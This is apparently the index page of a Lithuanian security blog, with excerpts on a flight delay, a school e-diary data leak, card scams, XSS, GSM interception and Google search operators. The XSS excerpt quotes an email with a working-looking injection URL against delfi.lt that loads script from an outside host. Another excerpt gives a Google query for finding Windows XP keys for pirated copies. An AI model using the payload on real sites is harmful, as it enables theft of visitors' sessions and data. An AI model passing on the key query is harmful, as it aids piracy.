Na rodos pagaliau baigiau visas savo vasaros atostogas. Viskas buvo gerai, kol neprireikė skristi atgal FlyLAL’u. Išskridau beveik 5 valandom vėliau nei turėjau (visą tą laiką teko praleisti oro uoste), leidomės Kaune, važiavom iki Vilniaus autobusu, o bagažas nuskrido kitu lėktuvu ir atsirado tik kitą dieną po pietų. Vietoj planuotų 7 valandų kelionės namo, ji užtruko visas 14 ir namie buvau tik 5:00, dėl ko sėkmingai buvo iki galo sufakapinta ir visa pirmadieninė darbo diena. Oro uoste priežasčių tiksliai paaiškinti negalėjo, bet kažkodėl vietoj vieno didelio lėktuvo atskrido du maži. Žinoma, FlyLAL’as elgėsi lietuviškai. Neišstenėjo net ir kriu kriu, nors ir buvo didelė didelė kiaulė (tokia rožinė, boingo dydžio). Dabar “džiaugiuosi” galėdamas dirbti visą savaitę po 12 valandų per dieną už praleistą pirmadienį (planas buvo po 10). Šiandien vakarop (naktį?) jau sugebėjau žvilgtelėti ir kas čia įdomaus aplinkui vyksta. Užkliuvo mokyklų elektroninio dienyno istorija. Šiaip viskas įvykdyta pakankamai neetiškai, nes pažeidžiamumas su detaliomis instrukcijomis paskelbtas viešai prieš tai neinformavus sistemos kūrėjų ir jo nepašalinus. Viso pažeidžiamumo akcentas buvo ne galimybė moksleiviams pasiredaguoti pažymius ar pastabas, bet galimybė pavogti asmeninius duomenis. Tad šį kartą norėčiau grįžti prie šios temos ir eilinį kartą panagrinėti tuos atvejus, kai asmeniniai duomenys paviešinami dėl žmonių, o ne sistemų klaidų. Beveik prieš metus rašiau apie būdą, kaip Google pagalba internete ieškoti asmens kodų.

Skaityti visą įrašą…

Baigėsi mano atostogos. Visai smagiai su draugais pabuvau Slovakijoje. Didžiąją dalį laiko kopinėjom kalnais (su nakvyne juose), kartais plaukiojom upe. Čia aš plaukiu plaustu.

Kur dar 4 plaukę kartu - velniai žino. Gal dar neišnėrę. Važiavom savu automobiliu, nes su kelionių agentūra taip nepasilinksminsi. Bet ne apie tai bus šis pasakojimas. Šį kartą papasakosiu apie tai, kaip technologijų neišmanantys, bet lengvai bendraujantys apgavikai švarina svetimas mokėjimo korteles. Kadangi dažniausiai įdomūs pasakojimai su visomis smulkmenomis, tai jis bus gausiai iliustruotas. Tiesa, iliustracijos ne mano, “vaikščiojančios” internetu, bet puikiai tiks šiam pasakojimui. Kai ką ir nutylėsiu, kad visokie “gudručiai” nepradėtų to taikyti praktikoje. Technika žinoma labai senai ir vis dar naudojama. Važiuojam.

Skaityti visą įrašą…

Ar girdėjot, kad Rusijos hakeriai ruošiasi pulti Lietuvą, Latviją, Estiją ir Ukrainą? Daugiau apie tai skaitykit čia: http://www.lrytas.lt/-12144139011212111835-p1-IT-Rus%C5%B3-hakeriai-planuoja-kibernetin%C4%AF-i%C5%A1puol%C4%AF-prie%C5%A1-Baltijos-%C5%A1alis-ir-Ukrain%C4%85.htm Pirmas rezultatas jau yra. Vyriausioji tarnybinės etikos komisija.

Pagal Lietuvos tinklalapių ir sistemų saugumo būklę, tai tikrai ne paskutinis. Kas kitas?

Gavau tik ką į paštą štai tokį laišką.

Si eilerasti parase veziu serganti paaugle. Ji noretu suzinoti, kiek zmoniu gavo jos eilerasti. Tai tikrai yra eilerastis.
Prasome perduoti ji kitiems. Ji issiunte jos gydytojas – butinai perskaitykite, kas parasyta baigiamajame zodyje po eilerasciu.

Lėtas šokis

Ar kada nors stebejote vaikus,
Skriejancius ratu?
Ar klausetes,
kaip lietus
Tyska i zeme?
Ar kada nors grozejotes drugelio sokiu?

<…praleista daug daug teksto…>

Skaityti visą įrašą…

Kadangi senai rašiau apie web saugumą, apklausoje daugiausiai balsų kol kas renka praktinių pamokų noras, o dar ir į el. paštą atėjo su tuo susijęs laiškas, tad šiandien ir parašysiu apie šiuo metu populiariausią ir daug diskusijų keliantį tinklalapių pažeidžiamumą. Tas web pažeidžiamumų pirmūnas yra Cross Site Scripting, kuris trumpinamas tiesiog XSS. XSS, o ne CSS todėl, kad tiesiog nebūtų painiojama su Cascading Style Sheets. Pagal įvairius duomenis jis sutinkamas 75%-80% tinklalapių. Lietuviški nei kiek neatsilieka. Kaip pasireiškia tas pažeidžiamumas? Pažeidžiamumas yra nukreiptas ne prieš pačius tinklalapius, bet prieš jų vartotojus. Jei tinklalapyje yra palikta tokia skylė, tuomet jo lankytojui galima pakišti papildomą HTML kodą arba skriptą, kurį lankytojo naršyklė apdoros ir įvykdys kaip originalų. Ką su tuo galima padaryti? Kai tik toks pažeidžiamumas buvo atrastas, tuomet dažniausiai buvo tiesiog dedamas Java skriptas, kuris vykdydavo amžiną ciklą ir mesdavo lankytojams nesibaigiantį pranešimą. Žodžiu, toks “baeris”, kuris neduodavo normaliai naršyti. Vėliau sėkmingai buvo pradėtos klastoti tinklalapių dalys. Pvz. bankinėje sistemoje ant originalių prisijungimo laukelių uždėdavo niekuo nesiskiriančius padirbtus prisijungimo langelius, kurie tiesiog surinkdavo prisijungimo duomenis ir persiųsdavo nusikaltėliams. Vėliau, be puslapių klastojimo į darba stipriai buvo “pajungti” visokie skriptai, vykdomi naršyklėje. Dabar JavaScript’o pagalba vagiami duomenys, apeinant ugniasienę patikrinamas vidinio tinklo saugumas, išnaudojami įvairūs pažeidžiamumai (pvz. perkonfigūruojami vidiniai router’iai), perimamos naršymo sesijos, admino teisės, pavagimai ištisi blogai ir t.t. Žodžiu, galimybių daug. Jei koks nors programuotojas sako, kad čia š…, o ne pažeidžiamumas, tai sumažinkit jam algą (arba pasiūlykit tą padaryti jo šefui). Dvigubai. Kol netnaujins žinių. Jei toks programuotojas esi tu pats, tai skubėk pasitasyti, kol tavo šefas tau nesumažino algos. Dvigubai. O jei rimtai, tai šiandien, išnaudojantys XSS pažeidžiamumą, po internetą jau sklando virusai ir valdomi botnet’ai. Tiesa, botnet’e dalyvis aktyvus būna tol, kol veikia naršyklė. Ir jei neišnaudojami kiti naršyklės pažeidžiamumai ir nepavyksta įkišti į OS kokio papildomo malware’o, tai iš tokio botnet’o pasišalinama tiesiog uždarant naršyklę. Žodžiu, čia buvo šiek tiek teorijos. Dabar kaip visa tai atrodo gyvai. Štai čia ir pacituosiu prieš kurį laiką man atėjusį laišką (kalba netaisyta).

Sveiki,
Siunčiu informacijos, kuri gali pasirodys įdomi.
Galbūt teko girdėti apie tinklapį xssed.com. Taigi turiu surinkęs
keletą lietuviškų tinklapių su tapačiu pažeidimu.
http://www.xssed.com/archive/author=F3nix/
Yra ir info.lt, delfi.lt ir t.t.
Delfi.lt tiesiog stebina savo aplaidumu. XSS skylė vis dar neužtaisyta, nors nuo pranešimo administratoriam praėjo bemaž pusė metų.

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%20
src=http://lol.freehost.lt/1.js%3E%3C/script%3E

Skaityti visą įrašą…

Noriu sugrįžti prie senesnės temos. T.y. apie mobilaus šnipinėjimą. Apie tai jau rašiau anksčiau, tačiau ne taip senai pasirodė įdomių naujienų. Bet gal nuo pradžių. GSM tinkluose yra naudojamas A5/0, A5/1 arba A5/2 šifravimo algoritmai. A5/0 žymėjimas reiškia, kad nenaudojamas joks šifravimas. A5/2 šifravimas lengvai įveikiamas naudojant nesudėtingą techniką. Šie du šifravimo būdai dėl savo nepatikimumo mažai kur pasaulyje naudojami (pvz. Serbijoje, Indijoje, Kenijoje), o visame pasaulyje labiausiai yra išplitęs 64 bitų A5/1 šifravimo algoritmas. Apie jo principą paskaitysite Wikipedijoje, tačiau jau kelis metus kalbama ir apie šį algoritmą, kad jis yra nesaugus ir nulaužiamas. Operatoriai guodėsi tuo, kad tas laužimas reikalauja daug laiko ir dar daugiau technininių resursų, todėl atitinkamai ir pinigų. Tų pinigų visam sprendimui reikėjo maždaug 1 000 000 USD. Kaip manot, kokios institucijos yra labiausiai suinteresuotos šnipinėjimu ir kurios gali tam išleisti tiek pinigų? Aišku, kad žmonos šnipinėjimui tiek investuoti nelabai kas ryžtūsi, privačiam verslui tai taip pat neapsimokėtų. Kas belieka turbūt jau aišku, o konkrečias struktūras galėsite atsirinkti ir patys. Žodžiu, kam labai reikėjo, tas tokią įrangą nusipirko. Įrangos tam yra įvairios. Pvz. vienos, nei šiokios, nei tokios, veikimo principas yra "aktyvi ataka", kurios metu reikia būti pakankamai arti reikiamo abonento, tuomet pradedama truputį "teršti" eterį, kad telefonas prisijungtų ne tiesiogiai prie operatoriaus GSM bazinės stoties, bet tyčia prie pakištos kitos, tarp kurios ir telefono šifravimas nevyksta ir t.t. Žodžiu sudėtinga ir daug vargo.

Skaityti visą įrašą…

Šiandien mane kaip reikiant sunervavo nezinau.lt su savo blogorama. Joje radau, kad bilietai į Blogin konferenciją jau pasibaigę. Kadangi šiandien pagaliau paaiškėjo, kad penktadienis man neužimtas, tai rytdieną planavau pradėti nuo bilieto pirkimo. Tai ką dabar rytoj ryte veikt? Ei, Blogin organizatoriai, kaip pirmo etapo blog’ų konkurso nugalėtojui galėtumėte kokį bilietą ir sukrapštyti. Žodžiu turiu problemą dabar gyvenime. Kur gauti bilietą?

Kad jau taip, tai pabūsiu šiandien blogas ir supažindinsiu Jus su linux live distribucija Backtrack 3. Kol kas tik beta. Bet jos autoriai sako, kad ne betoje bus tik didesnis suderinamumas su įranga.

Skaityti visą įrašą…

Turėjau BLOG‘ui paruošęs kelias temas, bet niekaip
neprisėsdavau jų parašyti. Tačiau šiandien internete pamačiau štai tokią
reklamą:

Nagai iš karto panižo. Po kelių minučių jau turėjau ir naują temą. Be technologinių trūkumų ten yra ir šio BLOG‘o skaitytojams įveikiamų trūkumų. Jau anksčiau rašiau, kad įsilaužėliui svarbu išmanyti ne tik technologijas, bet ir žmones. Juk problemos kyla ne dėl technologijų, o dėl jas kuriančių žmonių. Šiuo atveju inbox.lt turi paprastą saugumo trūkumą, kuriam išnaudoti visiškai nereikia technologinių žinių, pakanka trupučio logikos ir savos galvos. O jeigu dar pažįsti ir patį inbox.lt dėžutės turėtoją, tai užduotis gali būti ir visai paprasta. Todėl pirmą kartą šiame BLOG‘e skelbiu konkursą. Konkursą be prizo. Tiesiog dėl linksmumo.

Skaityti visą įrašą…

Kiek daugiau nei prieš savaitę Antanas su manimi pasidalino savo radiniu internete. Jei tau nuo nešiojamo kompo dugno nusitrynė, tu jį pametei arba tiesiog niekada neturėjai Windows XP registracijos numerio, tai diegiant šią sistemą tokį numerį gauti nėra problema. Ne, nereikia jokių specializuotų paieškos sistemų, tokių kaip astalavista.box.sk ir nereikia žinoti visokių slaptų viečikių internete, nes tą darbą gali padaryti Google. Tiesiog įvykdyk paiešką su tokiais duomenimis:“Windows XP Professional” “Belarc Advisor Current Profile” key: Ar jau radai tinkamą raktą savo piratinei windozės versijai?

Google. Senai apie jį rašiau. Daugelis turbūt naudojatės paprasčiausia paieška be jokių specialių operatorių. O jų Google turi nemažai ir naudojantis jais galima visai neblogai “patobulinti” paiėšką. Pvz. operatorius “intitle:”. Jei paieškoje panaudosi tokį operatorių, tai paieškos rezultatas bus puslapiai, kurių pavadinime yra nurodytas žodis. Dedu iliustracijas su pavyzdžiu.

Skaityti visą įrašą…